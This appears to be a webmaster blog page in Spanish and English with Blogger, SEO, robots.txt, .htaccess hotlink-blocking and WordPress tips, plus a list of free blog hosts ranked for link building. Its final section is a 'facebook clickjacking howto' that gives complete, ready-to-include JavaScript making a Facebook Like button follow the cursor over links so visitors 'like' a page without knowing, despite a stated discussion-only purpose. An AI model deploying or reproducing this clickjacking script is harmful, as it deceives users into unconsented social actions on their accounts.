Cómo evitar que Blogger redireccione al dominio de país

Blogger está redireccionando los accesos a los blos XXXX.blogspot.com a los dominios locales de los países según el usuario. Por ejemplo: XXXX.blogspot.com.ar, XXXX.blogspot.com.mx, XXXX.blogspot.com.co, etc… Aquí adjunto el código para poner en el HTML del template justo después de la marca <head> para evitar esto ya que trae varios problemas, especialmente al contabilizar visitas.

<script type="text/javascript">
var blog = document.location.hostname;
var slug = document.location.pathname;
var ctld = blog.substr(blog.lastIndexOf("."));
if (ctld != ".com") {
var ncr = "http://" + blog.substr(0, blog.indexOf("."));
ncr += ".blogspot.com/ncr" + slug;
window.location.replace(ncr);
}
</script>

SEO para los datos paginados

Muchas veces tenemos resultados de una búsqueda o artículos que por su extensión se ponen en varias paginas. El problema es que toda esa información pasa a verse en diferentes páginas que son entidades distintas para google. Lo deseable es que el buscador identifique que todo es parte de una unidad de resultado de búsqueda, por lo tanto:

Si existe una página alternativa para ver todos los resultados, dejarlo como está que google se da cuenta y usará la misma como landing page de los resultados del buscador.

Si no existe una página de ver todos los resultados, entonces hay dos alternativas:

Usar ref ”canonical” para el caso en que las diferentes paginas sean contenidos repetidos de una principal

Usar ref = “next” y ref = “prev” como tag en los links de paginación y así google hará que todo sea parte de una unidad de información y llevará a la primer página como resultado de la búsqueda.

Bajar el consumo de recursos de los spiders en tu sitio

Cuando se contratan server de hosting baratos, estos dicen ser ilimitados pero no lo son. Si te pasas de la raya te cortan el servicio. Por lo que si tienes un poquito de tráfico, estás en riesgo de que te echen y no te den más el servicio. Créase o no, los spider, crawlers y bots que andan por la red generan el 50% aproximadamente de las visitas a tu sitio. Google se la pasa mirando si no has tenido alguna modificación para indexar todo cuanto antes. Por lo que hay que pedirle que no sea tan molesto y no genere una excesiva carga en nuestro servidor baratito.

Una de las formas es modificar el robots.txt y agregar una línea de comando pidiendo que acceda más espaciadamente. Esto de esapaciado puede ser –por ejemplo- no más de un acceso cada 20 segundos. No te modificará en nada la velocidad con que tendrás tus páginas indexadas, pero te puede hacer una gran diferencia en la carga de tu servidor.

Crawl-delay: 20

Hotlinking – como evitar que te roben ancho de banda

En el root de los servers existe un archivo llamado .htaccess que tiene en su control redireccionamientos y otras cosas delicadas del sistema. Es allí donde podemos agregar unas líneas para que cuando hay un acceso desde otro sitio para mostrar una imagen, mostramos otra cosa. Al final del .htaccess agregamos entonces las siguientes líneas reemplazando donde dice MISITIO la URL de tu blog y donde dice PATHIMAGENDESTINO la imagen que queremos mostrar en su lugar que conviene ponerla en un servidor gratuito de imágenes x ej http://www.flickr/….. Aprovechen y pongan alguna publicidad de algo propio así lo obtienen gratuitamente.

Si estás utilizando blogger esto no lo podrás hacer por falta de acceso al .htaccess pero además no te hará falta ya que el ancho de banda de google es ilimitado. Si tienes contratado un hosting de 5 dólares por mes donde tienes un Wordpress, te será de gran utilidad si tu sitio ya tiene un tiempo y seguramente algún pillo ha hecho hotlink de tus imágenes.

# BEGIN HotLink Off
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?MISITIO\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png|jpg)$ PATHIMAGENREEMPLAZO [L]

# END HotLink Off

Sitios de blogs gratuitos para link buisding por PR

US-based: 68 (sorted by PR)

Code:

wordpress.com,pr9
livejournal.com,pr8
my.opera.com,pr8
tripod.com,pr8
tumblr.com,pr8
typepad.com,pr8
weebly.com,pr8
angelfire.com,pr7
multiply.com,pr7
my.telegraph.co.uk,pr7
officelive.com,pr7
posterous.com,pr7
rediff.com,pr7
salon.com,pr7
wikidot.com,pr7
wikispaces.com,pr7
yola.com,pr7
webs.com,pr7
squidoo.com,pr7
areavoices.com,pr6
blog.com,pr6
blogger.com,pr6
doodlekit.com,pr6
edublogs.org,pr6
fc2.com,pr6
gather.com,pr6
hubpages.com,pr6
onsugar.com,pr6
quizilla.teennick.com,pr6
travelblog.org,pr6
ucoz.com,pr6
webspawner.com,pr6
wetpaint.com,pr6
xanga.com,pr6
blinkweb.com,pr5
blogetery.com,pr5
devhub.com,pr5
flixya.com,pr5
getjealous.com,pr5
insanejournal.com,pr5
livelogcity.com,pr5
ohlog.com,pr5
shutterfly.com,pr5
snappages.com,pr5
spruz.com,pr5
thoughts.com,pr5
zoomshare.com,pr5
2itb.com,pr4
blogge.rs,pr4
bloghi.com,pr4
blogreaction.com,pr4
blurty.com,pr4
inube.com,pr4
lifeyo.com,pr4
myblogsite.com,pr4
mywapblog.com,pr4
mytripjournal.com,pr4
yousaytoo.com,pr4
spi-blog.com,pr4
bcz.com,pr3
blogster.com,pr3
iblog.at,pr3
weblogplaza.com,pr3
spyuser.com,pr3
sweetcircles.com,pr3
blogpico.com,pr2
evood.com,pr2
uwcblog.com,pr2

non-US English: 30 (sorted by PR)

Code:

jimdo.com,pr7
page.tl,pr7
webnode.com,pr7
journalspace.com,pr6
springnote.com,pr6
soup.io,pr6
blog.co.uk,pr6
webstarts.com,pr6
moonfruit.com,pr6
hpage.com,pr5
ewebsite.com,pr5
webgarden.com,pr5
beep.com,pr5
350.com,pr5
freehostia.com,pr5
freeflux.net,pr5
qapacity.com,pr5
dinstudio.com,pr5
iseekblog.com,pr4
bloggum.com,pr4
doomby.com,pr4
blog.ca,pr4
wallinside.com,pr4
hipero.com,pr4
quechup.com,pr4
fotopages.com,pr4
freeblogspot.org,pr4
sitew.com,pr3
freeweb.me,pr3
ibizlog.com,pr3

non-English

Code:

blog.de,pr6
freeblog.hu,pr6
alivenotdead.com,pr5
blog.com.es,pr5
blog.hr,pr5
blog.nl,pr5
hazblog.com,pr5
punt.nl,pr5
pimpblog.nl,pr3

Cómo cambiar Wordpress de subdirectorio

Have you ever had the need to install wordpress in a subdirectory/subfolder or even replicate a previous instalation of wordpress and simply couldn’t get it to work?

1) Let’s assume your site is magro.ic21.eu and you need to install it to magro.ic21.eu/foobar
2) Create the subdirectory (I’ named it foobar)
3) Move all files from the previous wordpress directory to foobar
4) You’ll notice that magro.ic21.eu/foobar will not have any posts displayed and wp-admin will not work.
5) Go to mysql prompt and issue the following command:
update wp_options set option_value='http://magro.ic21.eu/foobar' where option_name = 'home' or option_name = 'siteurl';

NOTE: You need to change magro.ic21.eu/foobar with your site/subdirectory name!!!

facebook clickjacking howto

facebook clickjacking howto allows setting up a website where users will do a facebook like without their knowledge when clicking any link on the page. This works by dragging an invisible (very low opacity) facebook like button bellow the mouse when the user hovers a link.

How it works

Since we cannot inject css or javascript inside the facebook iframe, we cannot change the cursor:pointer css property when the mouse is over the like button, so it would be suspicious to have a page always with a clicking-hand mouse cursor. The workaround was making the like button follow the mouse when it’s normal to have a clicking-hand mouse cursor (cursor:pointer) such as when hovering a link!

After clicking a link, the user will like the current page in facebook and will in fact be redirected to the href (through javascript magic – document.location.href) and a cookie will be defined so that the facebook like button no longer appears in future page loads.

Mitigation

The purpose of this script is creating a discussion about how to PREVENT clickjacking and by using this script for any reason other than security debugging you might be violating Facebook Terms and Service Statements and might lose your Facebook account.

As such, the code you have below it’s easily found on the web if you use it in your website and I’ll personally report you if you use it for malicious reasons.

What we’ll see in the future

Before discussing how clickjacking will evolve, there is an important assumption to keep in mind: it’s possible to share a website not directly connected to where the like button is placed, meaning I might place a like button in fernandomagro.com liking another website/domain.

So, it’s possible to create a database of websites and generate a lot of different like buttons consecutively in the same website.

Wrapping it all up, when Facebook Clickjacking goes viral, I believe we will start seeing consecutive clickjacking likes/shares from malicious websites with huge galleries where a lot of clicking takes place. Example: having a gallery with 500 interesting pictures, imagine clicking those galleries for 2 hours and then returning to facebook and realizing the account was flooded with a huge amount of unrequested likes.

Install it

I managed to wrap it all up around a nice javascript file that you just need to include to make it work in your webpage.

Change the headers of your webpage with the following:

<script src="http://code.jquery.com/jquery-1.5.js"></script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script>window.DO_CLICKJACKING = 1</script>
<script src="clickjacking.js"></script>

Then, download the file clickjacking.js and put it in an accessible folder:

var $J = jQuery.noConflict(); 

// solve: images and floating divs
function heightestChild(elem)
{
	var t=0;
	var t_elem;
	$J("*",elem).each(function () {
	    if ( $J(this).outerHeight(true) > t ) {
	        t_elem=$J(this);
	        t=t_elem.outerHeight(true);
	    }
	});
	// we care about the heighest
	if (elem.outerHeight(true) > t)
	{
		t = elem.outerHeight(true);
	}

	//return elem.outerHeight(true);
	return t+3; // hotfix
}

function highestOffsetTop(elem)
{
	var t=elem.offset().top;
	var t_elem;
	$J("*",elem).each(function () {
	    if ( $J(this).offset().top < t ) {
	        t_elem=$J(this);
	        t=t_elem.offset().top;
	    }
	});
	// we only care about the object that is most on top
	if (elem.offset().top < t)
	{
		t = elem.offset().top;
	}

	//return elem.offset().top;
	return t+3;
}

// 57 19 63

$J(document).ready(function(){
	if (window.DO_CLICKJACKING) { // wrap up EVERYTHING

	/*$J("body").append('<div id="clickjacking" style="position:absolute;display:block;opacity:0.01;-khtml-opacity:.01;-moz-opacity:.01;filter:alpha(opacity=1);"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');*/
	$J("body").append('<div id="clickjacking" style="position:absolute;display:block;"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');

	var elementWidth = 0;
	var elementHeight = 0;
	var theElement = '';
	var likeDone = 0;

	if ($J.cookie("clickjacking_"+escape(document.URL)) == 1)
	{
		likeDone = 1;
	}

	// fired when the user clicks a link (likes our page) -> clickjacking is done
	FB.Event.subscribe('edge.create', function(response) {
		  $J("#clickjacking").css("display", "none");
		  likeDone = 1;
		  $J.cookie("clickjacking_"+escape(document.URL), "1");
		  // let the user actually go to the link he clicked.
		  window.location.href = theElement.attr('href');
	});

$J(document).mousemove(function(event) {
		if (theElement != '')
		{
			if (event.pageY < (highestOffsetTop(theElement)-4) || event.pageY > (highestOffsetTop(theElement) + heightestChild(theElement)) || event.pageX < theElement.offset().left || event.pageX > (theElement.offset().left + theElement.width()) )
			{
				//alert(event.pageY + " " + theElement.height() + " " + theElement.offset().top);
			/*	$J("#log").append("<p>mouse off the element LEFT " + event.pageX  + " " + theElement.offset().left + " " + (theElement.offset().left + theElement.width()) +  "</p>");
				$J("#log").append("<p>mouse off the element TOP " + event.pageY  + " " + highestOffsetTop(theElement) + " " + (highestOffsetTop(theElement) + heightestChild(theElement,true)) +  "</p>");*/
				theElement = ''; // the mouse is off theElement
				$J("#clickjacking").css("display", "none");
			}
			else
			{
				if ($J.browser.msie) {
					$J("#clickjacking").css("top",(event.pageY-15)+"px");
					$J("#clickjacking").css("left",(event.pageX-20)+"px");
				}
				else
				{
					$J("#clickjacking").css("top",(event.pageY-5)+"px");
					$J("#clickjacking").css("left",(event.pageX-20)+"px");
				}
			}
		}
});

$J(document).delegate("a","mouseenter", function (){
	// register mouse is inside element
	if (likeDone == 0)
	{
		theElement = $J(this);
		$J("#clickjacking").css("display", "block");
	}
}); 

} // window.DO_CLICKJACKING
});

/**
 * Cookie plugin
 *
 * Copyright (c) 2006 Klaus Hartl (stilbuero.de)
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 *
 */

/**
 * Create a cookie with the given name and value and other optional parameters.
 *
 * @example $.cookie('the_cookie', 'the_value');
 * @desc Set the value of a cookie.
 * @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true });
 * @desc Create a cookie with all available options.
 * @example $.cookie('the_cookie', 'the_value');
 * @desc Create a session cookie.
 * @example $.cookie('the_cookie', null);
 * @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain
 *       used when the cookie was set.
 *
 * @param String name The name of the cookie.
 * @param String value The value of the cookie.
 * @param Object options An object literal containing key/value pairs to provide optional cookie attributes.
 * @option Number|Date expires Either an integer specifying the expiration date from now on in days or a Date object.
 *                             If a negative value is specified (e.g. a date in the past), the cookie will be deleted.
 *                             If set to null or omitted, the cookie will be a session cookie and will not be retained
 *                             when the the browser exits.
 * @option String path The value of the path atribute of the cookie (default: path of page that created the cookie).
 * @option String domain The value of the domain attribute of the cookie (default: domain of page that created the cookie).
 * @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie transmission will
 *                        require a secure protocol (like HTTPS).
 * @type undefined
 *
 * @name $.cookie
 * @cat Plugins/Cookie
 * @author Klaus Hartl/klaus.hartl@stilbuero.de
 */

/**
 * Get the value of a cookie with the given name.
 *
 * @example $.cookie('the_cookie');
 * @desc Get the value of a cookie.
 *
 * @param String name The name of the cookie.
 * @return The value of the cookie.
 * @type String
 *
 * @name $.cookie
 * @cat Plugins/Cookie
 * @author Klaus Hartl/klaus.hartl@stilbuero.de
 */
jQuery.cookie = function(name, value, options) {
    if (typeof value != 'undefined') { // name and value given, set cookie
        options = options || {};
        if (value === null) {
            value = '';
            options.expires = -1;
        }
        var expires = '';
        if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) {
            var date;
            if (typeof options.expires == 'number') {
                date = new Date();
                date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000));
            } else {
                date = options.expires;
            }
            expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not supported by IE
        }
        // CAUTION: Needed to parenthesize options.path and options.domain
        // in the following expressions, otherwise they evaluate to undefined
        // in the packed version for some reason...
        var path = options.path ? '; path=' + (options.path) : '';
        var domain = options.domain ? '; domain=' + (options.domain) : '';
        var secure = options.secure ? '; secure' : '';
        document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join('');
    } else { // only name given, get cookie
        var cookieValue = null;
        if (document.cookie && document.cookie != '') {
            var cookies = document.cookie.split(';');
            for (var i = 0; i < cookies.length; i++) {
                var cookie = jQuery.trim(cookies[i]);
                // Does this cookie string begin with the name we want?
                if (cookie.substring(0, name.length + 1) == (name + '=')) {
                    cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
                    break;
                }
            }
        }
        return cookieValue;
    }
};